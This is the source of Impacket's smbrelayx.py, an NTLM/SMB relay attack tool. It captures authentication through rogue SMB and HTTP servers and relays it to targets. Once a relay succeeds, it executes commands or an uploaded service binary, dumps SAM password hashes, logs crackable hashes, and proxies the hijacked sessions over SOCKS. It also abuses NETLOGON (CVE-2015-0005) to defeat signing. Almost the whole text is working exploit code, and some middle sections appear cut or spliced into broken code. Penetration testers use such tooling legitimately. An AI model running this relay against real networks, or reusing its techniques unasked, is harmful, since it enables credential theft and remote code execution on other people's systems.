#!/usr/bin/env python # Impacket - Collection of Python classes for working with network protocols. # # SECUREAUTH LABS. Copyright (C) 2020 SecureAuth Corporation. All rights reserved. # # This software is provided under a slightly modified version # of the Apache Software License. See the accompanying LICENSE file # for more information. # # Description: # SMB Relay Module # This module performs the SMB Relay attacks originally discovered # by cDc. It receives a list of targets and for every connection received it # will choose the next target and try to relay the credentials. Also, if # specified, it will first to try authenticate against the client connecting # to us. # # It is implemented by invoking a SMB and HTTP Server, hooking to a few # functions and then using the smbclient portion. It is supposed to be # working on any LM Compatibility level. The only way to stop this attack # is to enforce on the server SPN checks and or signing. # # If the target system is enforcing signing and a machine account was provided, # the module will try to gather the SMB session key through # NETLOGON (CVE-2015-0005). # # If the authentication against the targets succeed, the client authentication # success as well and a valid connection is set against the local smbserver. # It's up to the user to set up the local smbserver functionality. One option # is to set up shares with whatever files you want to the victim thinks it's # connected to a valid SMB server. All that is done through the smb.conf file or # programmatically. # # Author: # Alberto Solino (@agsolino) # from __future__ import division from __future__ import print_function try: import ConfigParser except ImportError: import configparser as ConfigParser import http.server import socketserver import argparse import base64 import logging import os import sys try: from urllib.parse import urlparse except ImportError: from urlparse import urlparse from binascii import unhexlify, hexlify from struct import pack, unpack from threading import Thread from six import PY2 from impacket import version from impacket.dcerpc.v5 import nrpc from impacket.dcerpc.v5 import transport from impacket.dcerpc.v5.ndr import NULL from impacket.dcerpc.v5.rpcrt import DCERPCException from impacket.examples import logger from impacket.examples import serviceinstall from impacket.examples.ntlmrelayx.servers.socksserver import activeConnections, SOCKS from impacket.examples.ntlmrelayx.clients.smbrelayclient import SMBRelayClient from impacket.nt_errors import ERROR_MESSAGES from impacket.nt_errors import STATUS_LOGON_FAILURE, STATUS_SUCCESS, STATUS_ACCESS_DENIED, STATUS_NOT_SUPPORTED, \ STATUS_MORE_PROCESSING_REQUIRED from impacket.ntlm import NTLMAuthChallengeResponse, NTLMAuthNegotiate, NTLMAuthChallenge, AV_PAIRS, \ NTLMSSP_AV_HOSTNAME, generateEncryptedSessionKey from impacket.smb import NewSMBPacket, SMBCommand, SMB, SMBSessionSetupAndX_Data, SMBSessionSetupAndX_Extended_Data, \ SMBSessionSetupAndX_Extended_Response_Parameters, SMBSessionSetupAndX_Extended_Response_Data, \ SMBSessionSetupAndX_Parameters, SMBSessionSetupAndX_Extended_Parameters, TypesMech, \ SMBSessionSetupAndXResponse_Parameters, SMBSessionSetupAndXResponse_Data from impacket.smb3 import SMB3 from impacket.smbconnection import SMBConnection from impacket.smbserver import outputToJohnFormat, writeJohnOutputToFile, SMBSERVER from impacket.spnego import ASN1_AID, SPNEGO_NegTokenResp, SPNEGO_NegTokenInit try: from Cryptodome.Cipher import DES, AES, ARC4 except Exception: logging.critical("Warning: You don't have any crypto installed. You need pycryptodomex") logging.critical("See https://pypi.org/project/pycryptodomex/") # Global Variables # This is the list of hosts that have been attacked already in case -one-shot was chosen ATTACKED_HOSTS = set() CODEC = sys.getdefaultencoding() class doAttack(Thread): def __init__(self, SMBClient, exeFile, command): Thread.__init__(self) if isinstance(SMBClient, SMB) or isinstance(SMBClient, SMB3): self.__SMBConnection = SMBConnection(existingConnection = SMBClient) else: self.__SMBConnection = SMBClient self.__exeFile = exeFile self.__command = command self.__answerTMP = b'' if exeFile is not None: self.installService = serviceinstall.ServiceInstall(SMBClient, exeFile) def __answer(self, data): self.__answerTMP += data def run(self): # Here PUT YOUR CODE! global ATTACKED_HOSTS if self.__exeFile is not None: result = self.installService.install() if result is True: logging.info("Service Installed.. CONNECT!") self.installService.uninstall() else: ATTACKED_HOSTS.remove(self.__SMBConnection.getRemoteHost()) else: from impacket.examples.secretsdump import RemoteOperations, SAMHashes samHashes = None try: # We have to add some flags just in case the original client did not # Why? needed for avoiding INVALID_PARAMETER flags1, flags2 = self.__SMBConnection.getSMBServer().get_flags() flags2 |= SMB.FLAGS2_LONG_NAMES self.__SMBConnection.getSMBServer().set_flags(flags2=flags2) remoteOps = RemoteOperations(self.__SMBConnection, False) remoteOps.enableRegistry() except Exception as e: logging.debug('Exception:', exc_info=True) # Something wen't wrong, most probably we don't have access as admin. aborting logging.error(str(e)) ATTACKED_HOSTS.remove(self.__SMBConnection.getRemoteHost()) return try: if self.__command is not None: remoteOps._RemoteOperations__executeRemote(self.__command) logging.info("Executed specified command on host: %s", self.__SMBConnection.getRemoteHost()) self.__answerTMP = b'' self.__SMBConnection.getFile('ADMIN$', 'Temp\\__output', self.__answer) logging.debug('Raw answer %r' % self.__answerTMP) try: print(self.__answerTMP.decode(CODEC)) except UnicodeDecodeError: logging.error('Decoding error detected, consider running chcp.com at the target,\nmap the result with ' 'https://docs.python.org/3/library/codecs.html#standard-encodings\nand then execute smbrelayx.py ' 'again with -codec and the corresponding codec') print(self.__answerTMP) self.__SMBConnection.deleteFile('ADMIN$', 'Temp\\__output') else: bootKey = remoteOps.getBootKey() remoteOps._RemoteOperations__serviceDeleted = True samFileName = remoteOps.saveSAM() samHashes = SAMHashes(samFileName, bootKey, isRemote = True) samHashes.dump() logging.info("Done dumping SAM hashes for host: %s", self.__SMBConnection.getRemoteHost()) except Exception as e: logging.debug('Exception:', exc_info=True) ATTACKED_HOSTS.remove(self.__SMBConnection.getRemoteHost()) logging.error(str(e)) finally: if samHashes is not None: samHashes.finish() if remoteOps is not None: remoteOps.finish() try: ATTACKED_HOSTS.remove(self.__SMBConnection.getRemoteHost()) except Exception as e: logging.error(str(e)) pass class SMBClient(SMB): def __init__(self, remote_name, extended_security = True, sess_port = 445): self._extendedSecurity = extended_security self.domainIp = None self.machineAccount = None self.machineHashes = None SMB.__init__(self,remote_name, remote_name, sess_port = sess_port) def neg_session(self): neg_sess = SMB.neg_session(self, extended_security = self._extendedSecurity) return neg_sess def setUid(self,uid): self._uid = uid def login_standard(self, user, domain, ansiPwd, unicodePwd): smb = NewSMBPacket() smb['Flags1'] = 8 sessionSetup = SMBCommand(SMB.SMB_COM_SESSION_SETUP_ANDX) sessionSetup['Parameters'] = SMBSessionSetupAndX_Parameters() sessionSetup['Data'] = SMBSessionSetupAndX_Data() sessionSetup['Parameters']['MaxBuffer'] = 65535 sessionSetup['Parameters']['MaxMpxCount'] = 2 sessionSetup['Parameters']['VCNumber'] = os.getpid() sessionSetup['Parameters']['SessionKey'] = self._dialects_parameters['SessionKey'] sessionSetup['Parameters']['AnsiPwdLength'] = len(ansiPwd) sessionSetup['Parameters']['UnicodePwdLength'] = len(unicodePwd) sessionSetup['Parameters']['Capabilities'] = SMB.CAP_RAW_MODE sessionSetup['Data']['AnsiPwd'] = ansiPwd sessionSetup['Data']['UnicodePwd'] = unicodePwd sessionSetup['Data']['Account'] = user sessionSetup['Data']['PrimaryDomain'] = domain sessionSetup['Data']['NativeOS'] = 'Unix' sessionSetup['Data']['NativeLanMan'] = 'Samba' smb.addCommand(sessionSetup) self.sendSMB(smb) smb = self.recvSMB() try: smb.isValidAnswer(SMB.SMB_COM_SESSION_SETUP_ANDX) except: logging.error("Error login_standard") return None, STATUS_LOGON_FAILURE else: self._uid = smb['Uid'] return smb, STATUS_SUCCESS def setDomainAccount( self, machineAccount, machineHashes, domainIp): self.machineAccount = machineAccount self.machineHashes = machineHashes self.domainIp = domainIp if self._SignatureRequired is True: if self.domainIp is None: logging.error("Signature is REQUIRED on the other end, attack will not work") else: logging.info("Signature is REQUIRED on the other end, using NETLOGON approach") def netlogonSessionKey(self, challenge, authenticateMessageBlob): # Here we will use netlogon to get the signing session key logging.info("Connecting to %s NETLOGON service" % self.domainIp) respToken2 = SPNEGO_NegTokenResp(authenticateMessageBlob) authenticateMessage = NTLMAuthChallengeResponse() authenticateMessage.fromString(respToken2['ResponseToken'] ) _, machineAccount = self.machineAccount.split('/') domainName = authenticateMessage['domain_name'].decode('utf-16le') try: av_pairs = authenticateMessage['ntlm'][44:] av_pairs = AV_PAIRS(av_pairs) serverName = av_pairs[NTLMSSP_AV_HOSTNAME][1].decode('utf-16le') except: logging.debug("Exception:", exc_info=True) # We're in NTLMv1, not supported return STATUS_ACCESS_DENIED stringBinding = r'ncacn_np:%s[\PIPE\netlogon]' % self.domainIp rpctransport = transport.DCERPCTransportFactory(stringBinding) if len(self.machineHashes) > 0: lmhash, nthash = self.machineHashes.split(':') else: lmhash = '' nthash = '' if hasattr(rpctransport, 'set_credentials'): # This method exists only for selected protocol sequences. rpctransport.set_credentials(machineAccount,'', domainName, lmhash, nthash) dce = rpctransport.get_dce_rpc() dce.connect() dce.bind(nrpc.MSRPC_UUID_NRPC) resp = nrpc.hNetrServerReqChallenge(dce, NULL, serverName+'\x00', '12345678') serverChallenge = resp['ServerChallenge'] if self.machineHashes == '': ntHash = None else: ntHash = unhexlify(self.machineHashes.split(':')[1]) sessionKey = nrpc.ComputeSessionKeyStrongKey('', '12345678', serverChallenge, ntHash) ppp = nrpc.ComputeNetlogonCredential('12345678', sessionKey) nrpc.hNetrServerAuthenticate3(dce, NULL, machineAccount + '\x00', nrpc.NETLOGON_SECURE_CHANNEL_TYPE.WorkstationSecureChannel, serverName + '\x00', ppp, 0x600FFFFF) clientStoredCredential = pack('=0 or message.find('RPC_IN'): return self.do_GET() return http.server.SimpleHTTPRequestHandler.send_error(self,code,message) def do_GET(self): messageType = 0 if PY2: authorizationHeader = self.headers.getheader('Authorization') else: authorizationHeader = self.headers.get('Authorization') if authorizationHeader is None: self.do_AUTHHEAD(message = b'NTLM') pass else: #self.do_AUTHHEAD() typeX = authorizationHeader try: _, blob = typeX.split('NTLM') token = base64.b64decode(blob.strip()) except: self.do_AUTHHEAD() messageType = unpack('> 16 packet['ErrorClass'] = errorCode & 0xff return None, [packet], STATUS_NOT_SUPPORTED else: logging.info("SMBD: Received connection from %s, attacking target %s" % (connData['ClientIP'] ,self.target)) try: if recvPacket['Flags2'] & SMB.FLAGS2_EXTENDED_SECURITY == 0: extSec = False else: if self.mode.upper() == 'REFLECTION': # Force standard security when doing reflection logging.info("Downgrading to standard security") extSec = False recvPacket['Flags2'] += (~SMB.FLAGS2_EXTENDED_SECURITY) else: extSec = True client = SMBClient(self.target, extended_security = extSec) client.setDomainAccount(self.machineAccount, self.machineHashes, self.domainIp) client.set_timeout(60) except Exception as e: logging.error("Connection against target %s FAILED" % self.target) logging.error(str(e)) else: encryptionKey = client.get_encryption_key() smbData[self.target] = {} smbData[self.target]['SMBClient'] = client if encryptionKey is not None: connData['EncryptionKey'] = encryptionKey smbServer.setConnectionData('SMBRelay', smbData) smbServer.setConnectionData(connId, connData) return self.origSmbComNegotiate(connId, smbServer, SMBCommand, recvPacket) ############################################################# def SmbSessionSetupAndX(self, connId, smbServer, smbCommand, recvPacket): connData = smbServer.getConnectionData(connId, checkStatus = False) ############################################################# # SMBRelay smbData = smbServer.getConnectionData('SMBRelay', False) ############################################################# respSMBCommand = SMBCommand(SMB.SMB_COM_SESSION_SETUP_ANDX) global ATTACKED_HOSTS if connData['_dialects_parameters']['Capabilities'] & SMB.CAP_EXTENDED_SECURITY: # Extended security. Here we deal with all SPNEGO stuff respParameters = SMBSessionSetupAndX_Extended_Response_Parameters() respData = SMBSessionSetupAndX_Extended_Response_Data() sessionSetupParameters = SMBSessionSetupAndX_Extended_Parameters(smbCommand['Parameters']) sessionSetupData = SMBSessionSetupAndX_Extended_Data() sessionSetupData['SecurityBlobLength'] = sessionSetupParameters['SecurityBlobLength'] sessionSetupData.fromString(smbCommand['Data']) connData['Capabilities'] = sessionSetupParameters['Capabilities'] if unpack('B',sessionSetupData['SecurityBlob'][0:1])[0] != ASN1_AID: # If there no GSSAPI ID, it must be an AUTH packet blob = SPNEGO_NegTokenResp(sessionSetupData['SecurityBlob']) token = blob['ResponseToken'] else: # NEGOTIATE packet blob = SPNEGO_NegTokenInit(sessionSetupData['SecurityBlob']) token = blob['MechToken'] # Here we only handle NTLMSSP, depending on what stage of the # authentication we are, we act on it messageType = unpack('> 16 packet['ErrorClass'] = errorCode & 0xff return None, [packet], STATUS_NOT_SUPPORTED # It might happen if the target connects back before a previous connection has finished, we might # get to this function w/o having the dict and smbClient entry created, because a # NEGOTIATE_CONNECTION was not needed if (self.target in smbData) is False: smbData[self.target] = {} smbClient = SMBClient(self.target) smbClient.setDomainAccount(self.machineAccount, self.machineHashes, self.domainIp) smbClient.set_timeout(60) smbData[self.target]['SMBClient'] = smbClient smbClient = smbData[self.target]['SMBClient'] clientChallengeMessage = smbClient.sendNegotiate(token) challengeMessage = NTLMAuthChallenge() challengeMessage.fromString(clientChallengeMessage) ############################################################# respToken = SPNEGO_NegTokenResp() # accept-incomplete. We want more data respToken['NegState'] = b'\x01' respToken['SupportedMech'] = TypesMech['NTLMSSP - Microsoft NTLM Security Support Provider'] respToken['ResponseToken'] = challengeMessage.getData() # Setting the packet to STATUS_MORE_PROCESSING errorCode = STATUS_MORE_PROCESSING_REQUIRED # Let's set up an UID for this connection and store it # in the connection's data # Picking a fixed value # TODO: Manage more UIDs for the same session connData['Uid'] = 10 # Let's store it in the connection data connData['CHALLENGE_MESSAGE'] = challengeMessage elif messageType == 0x03: # AUTHENTICATE_MESSAGE, here we deal with authentication ############################################################# # SMBRelay: Ok, so now the have the Auth token, let's send it # back to the target system and hope for the best. smbClient = smbData[self.target]['SMBClient'] authenticateMessage = NTLMAuthChallengeResponse() authenticateMessage.fromString(token) if authenticateMessage['user_name'] != '': clientResponse, errorCode = smbClient.sendAuth(connData['CHALLENGE_MESSAGE']['challenge'], sessionSetupData['SecurityBlob']) else: # Anonymous login, send STATUS_ACCESS_DENIED so we force the client to send his credentials errorCode = STATUS_ACCESS_DENIED if errorCode != STATUS_SUCCESS: # Let's return what the target returned, hope the client connects back again packet = NewSMBPacket() packet['Flags1'] = SMB.FLAGS1_REPLY | SMB.FLAGS1_PATHCASELESS packet['Flags2'] = SMB.FLAGS2_NT_STATUS | SMB.FLAGS2_EXTENDED_SECURITY packet['Command'] = recvPacket['Command'] packet['Pid'] = recvPacket['Pid'] packet['Tid'] = recvPacket['Tid'] packet['Mid'] = recvPacket['Mid'] packet['Uid'] = recvPacket['Uid'] packet['Data'] = b'\x00\x00\x00' packet['ErrorCode'] = errorCode >> 16 packet['ErrorClass'] = errorCode & 0xff # Reset the UID smbClient.setUid(0) logging.error("Authenticating against %s as %s\\%s FAILED" % ( self.target, authenticateMessage['domain_name'].decode('utf-16le'), authenticateMessage['user_name'].decode('utf-16le'))) # del (smbData[self.target]) return None, [packet], errorCode else: # We have a session, create a thread and do whatever we want logging.info("Authenticating against %s as %s\\%s SUCCEED" % ( self.target, authenticateMessage['domain_name'].decode('utf-16le'), authenticateMessage['user_name'].decode('utf-16le'))) ntlm_hash_data = outputToJohnFormat(connData['CHALLENGE_MESSAGE']['challenge'], authenticateMessage['user_name'], authenticateMessage['domain_name'], authenticateMessage['lanman'], authenticateMessage['ntlm']) logging.info(ntlm_hash_data['hash_string']) if self.server.getJTRdumpPath() != '': writeJohnOutputToFile(ntlm_hash_data['hash_string'], ntlm_hash_data['hash_version'], self.server.getJTRdumpPath()) # Target will be attacked, adding to the attacked set # If the attack fails, the doAttack thread will be responsible of removing it from the set ATTACKED_HOSTS.add(self.target) if self.runSocks is True: # Pass all the data to the socksplugins proxy protocolClient = SMBRelayClient(None, urlparse('smb://%s' % self.target)) protocolClient.session = SMBConnection(existingConnection=smbClient) activeConnections.put((self.target, 445, 'SMB', ('%s/%s' % ( authenticateMessage['domain_name'].decode('utf-16le'), authenticateMessage['user_name'].decode('utf-16le'))).upper(), protocolClient, connData)) logging.info("Adding %s(445) to active SOCKS connection. Enjoy" % self.target) del (smbData[self.target]) else: del (smbData[self.target]) clientThread = doAttack(smbClient,self.exeFile,self.command) clientThread.start() # Now continue with the server ############################################################# # Return status code of the authentication process. errorCode = self.returnStatus logging.info("Sending status code %s after authentication to %s" % ( ERROR_MESSAGES[self.returnStatus][0], connData['ClientIP'])) respToken = SPNEGO_NegTokenResp() # accept-completed respToken['NegState'] = b'\x00' # Status SUCCESS # Let's store it in the connection data connData['AUTHENTICATE_MESSAGE'] = authenticateMessage else: raise Exception("Unknown NTLMSSP MessageType %d" % messageType) respParameters['SecurityBlobLength'] = len(respToken) respData['SecurityBlobLength'] = respParameters['SecurityBlobLength'] respData['SecurityBlob'] = respToken.getData() else: # Process Standard Security respParameters = SMBSessionSetupAndXResponse_Parameters() respData = SMBSessionSetupAndXResponse_Data() sessionSetupParameters = SMBSessionSetupAndX_Parameters(smbCommand['Parameters']) sessionSetupData = SMBSessionSetupAndX_Data() sessionSetupData['AnsiPwdLength'] = sessionSetupParameters['AnsiPwdLength'] sessionSetupData['UnicodePwdLength'] = sessionSetupParameters['UnicodePwdLength'] sessionSetupData.fromString(smbCommand['Data']) connData['Capabilities'] = sessionSetupParameters['Capabilities'] ############################################################# # SMBRelay smbClient = smbData[self.target]['SMBClient'] if sessionSetupData['Account'] != '': clientResponse, errorCode = smbClient.login_standard(sessionSetupData['Account'], sessionSetupData['PrimaryDomain'], sessionSetupData['AnsiPwd'], sessionSetupData['UnicodePwd']) else: # Anonymous login, send STATUS_ACCESS_DENIED so we force the client to send his credentials errorCode = STATUS_ACCESS_DENIED if errorCode != STATUS_SUCCESS: # Let's return what the target returned, hope the client connects back again packet = NewSMBPacket() packet['Flags1'] = SMB.FLAGS1_REPLY | SMB.FLAGS1_PATHCASELESS packet['Flags2'] = SMB.FLAGS2_NT_STATUS | SMB.FLAGS2_EXTENDED_SECURITY packet['Command'] = recvPacket['Command'] packet['Pid'] = recvPacket['Pid'] packet['Tid'] = recvPacket['Tid'] packet['Mid'] = recvPacket['Mid'] packet['Uid'] = recvPacket['Uid'] packet['Data'] = '\x00\x00\x00' packet['ErrorCode'] = errorCode >> 16 packet['ErrorClass'] = errorCode & 0xff # Reset the UID smbClient.setUid(0) return None, [packet], errorCode # Now continue with the server else: # We have a session, create a thread and do whatever we want ntlm_hash_data = outputToJohnFormat(b'', sessionSetupData['Account'], sessionSetupData['PrimaryDomain'], sessionSetupData['AnsiPwd'], sessionSetupData['UnicodePwd']) logging.info(ntlm_hash_data['hash_string']) if self.server.getJTRdumpPath() != '': writeJohnOutputToFile(ntlm_hash_data['hash_string'], ntlm_hash_data['hash_version'], self.server.getJTRdumpPath()) # Target will be attacked, adding to the attacked set # If the attack fails, the doAttack thread will be responsible of removing it from the set ATTACKED_HOSTS.add(self.target) if self.runSocks is True: # Pass all the data to the socksplugins proxy protocolClient = SMBRelayClient(None, urlparse('smb://%s' % self.target)) protocolClient.session = SMBConnection(existingConnection=smbClient) activeConnections.put((self.target, 445, 'SMB', ('%s/%s' % ( sessionSetupData['PrimaryDomain'], sessionSetupData['Account'])).upper(), protocolClient, connData)) logging.info("Adding %s(445) to active SOCKS connection. Enjoy" % self.target) # Remove the target server from our connection list, the work is done del (smbData[self.target]) else: # Remove the target server from our connection list, the work is done del (smbData[self.target]) clientThread = doAttack(smbClient, self.exeFile, self.command) clientThread.start() # Now continue with the server ############################################################# # Do the verification here, for just now we grant access # TODO: Manage more UIDs for the same session errorCode = self.returnStatus logging.info("Sending status code %s after authentication to %s" % ( ERROR_MESSAGES[self.returnStatus][0], connData['ClientIP'])) connData['Uid'] = 10 respParameters['Action'] = 0 respData['NativeOS'] = smbServer.getServerOS() respData['NativeLanMan'] = smbServer.getServerOS() respSMBCommand['Parameters'] = respParameters respSMBCommand['Data'] = respData # From now on, the client can ask for other commands connData['Authenticated'] = True ############################################################# # SMBRelay smbServer.setConnectionData('SMBRelay', smbData) ############################################################# smbServer.setConnectionData(connId, connData) return [respSMBCommand], None, errorCode def _start(self): self.server.serve_forever() def run(self): logging.info("Setting up SMB Server") self._start() def setTargets(self, targets): self.target = targets def setExeFile(self, filename): self.exeFile = filename def setCommand(self, command): self.command = command def setSocks(self, socks): self.runSocks = socks def setReturnStatus(self, returnStatus): # Specifies return status after successful relayed authentication to return # to the connecting client. This comes useful when we don't want the connecting # client to store successful credentials in his memory. Valid statuses: # STATUS_SUCCESS - denotes that the connecting client passed valid credentials, # which will make him store them accordingly. # STATUS_ACCESS_DENIED - may occur for instance when the client is not a Domain Admin, # and got configured Remote UAC, thus preventing connection to ADMIN$ # STATUS_LOGON_FAILURE - which will tell the connecting client that the passed credentials # are invalid. self.returnStatus = { 'success' : STATUS_SUCCESS, 'denied' : STATUS_ACCESS_DENIED, 'logon_failure' : STATUS_LOGON_FAILURE }[returnStatus.lower()] def setMode(self,mode, one_shot): self.mode = mode self.one_shot = one_shot def setDomainAccount( self, machineAccount, machineHashes, domainIp): self.machineAccount = machineAccount self.machineHashes = machineHashes self.domainIp = domainIp # Process command-line arguments. if __name__ == '__main__': RELAY_SERVERS = ( SMBRelayServer, HTTPRelayServer ) print(version.BANNER) parser = argparse.ArgumentParser(add_help=False, description="For every connection received, this module will try to SMB relay that " " connection to the target system or the original client") parser.add_argument("--help", action="help", help='show this help message and exit') parser.add_argument('-ts', action='store_true', help='Adds timestamp to every logging output') parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON') parser.add_argument('-h', action='store', metavar='HOST', help='Host to relay the credentials to, if not it will relay it back to the client') parser.add_argument('-s', action='store', choices={'success', 'denied', 'logon_failure'}, default='success', help='Status to return after client performed authentication. Default: "success".') parser.add_argument('-e', action='store', required=False, metavar='FILE', help='File to execute on the target system. If not specified, hashes will be dumped ' '(secretsdump.py must be in the same directory)') parser.add_argument('-c', action='store', type=str, required=False, metavar='COMMAND', help='Command to execute on target system. If not specified, hashes will be dumped ' '(secretsdump.py must be in the same directory)') parser.add_argument('-socks', action='store_true', default=False, help='Launch a SOCKS proxy for the connection relayed') parser.add_argument('-one-shot', action='store_true', default=False, help='After successful authentication, only execute the attack once for each target') parser.add_argument('-codec', action='store', help='Sets encoding used (codec) from the target\'s output (default ' '"%s"). If errors are detected, run chcp.com at the target, ' 'map the result with ' 'https://docs.python.org/3/library/codecs.html#standard-encodings and then execute smbrelayx.py ' 'again with -codec and the corresponding codec ' % CODEC) parser.add_argument('-outputfile', action='store', help='base output filename for encrypted hashes. Suffixes will be added for ntlm and ntlmv2') parser.add_argument('-machine-account', action='store', required=False, help='Domain machine account to use when interacting with the domain to grab a session key for ' 'signing, format is domain/machine_name') parser.add_argument('-machine-hashes', action="store", metavar="LMHASH:NTHASH", help='Domain machine hashes, format is LMHASH:NTHASH') parser.add_argument('-domain', action="store", help='Domain FQDN or IP to connect using NETLOGON') try: options = parser.parse_args() except Exception as e: logging.error(str(e)) sys.exit(1) # Init the example's logger theme logger.init(options.ts) if options.codec is not None: CODEC = options.codec if options.debug is True: logging.getLogger().setLevel(logging.DEBUG) # Print the Library's installation path logging.debug(version.getInstallationPath()) else: logging.getLogger().setLevel(logging.INFO) logging.getLogger('impacket.smbserver').setLevel(logging.ERROR) if options.h is not None: logging.info("Running in relay mode") mode = 'RELAY' targetSystem = options.h else: logging.info("Running in reflection mode") targetSystem = None mode = 'REFLECTION' exeFile = options.e Command = options.c returnStatus = options.s threads = set() if options.socks is True: # Start a SOCKS proxy in the background s1 = SOCKS() socks_thread = Thread(target=s1.serve_forever) socks_thread.daemon = True socks_thread.start() threads.add(socks_thread) for server in RELAY_SERVERS: s = server(options.outputfile) s.setTargets(targetSystem) s.setExeFile(exeFile) s.setCommand(Command) s.setSocks(options.socks) s.setReturnStatus(returnStatus) s.setMode(mode, options.one_shot) if options.machine_account is not None and options.machine_hashes is not None and options.domain is not None: s.setDomainAccount( options.machine_account, options.machine_hashes, options.domain) elif (options.machine_account is None and options.machine_hashes is None and options.domain is None) is False: logging.error("You must specify machine-account/hashes/domain all together!") sys.exit(1) s.start() threads.add(s) print("") logging.info("Servers started, waiting for connections") while True: try: sys.stdin.read() except KeyboardInterrupt: logging.info('Quitting.. please wait') if options.socks is True: s1.shutdown() for s in threads: del(s) sys.exit(1) else: pass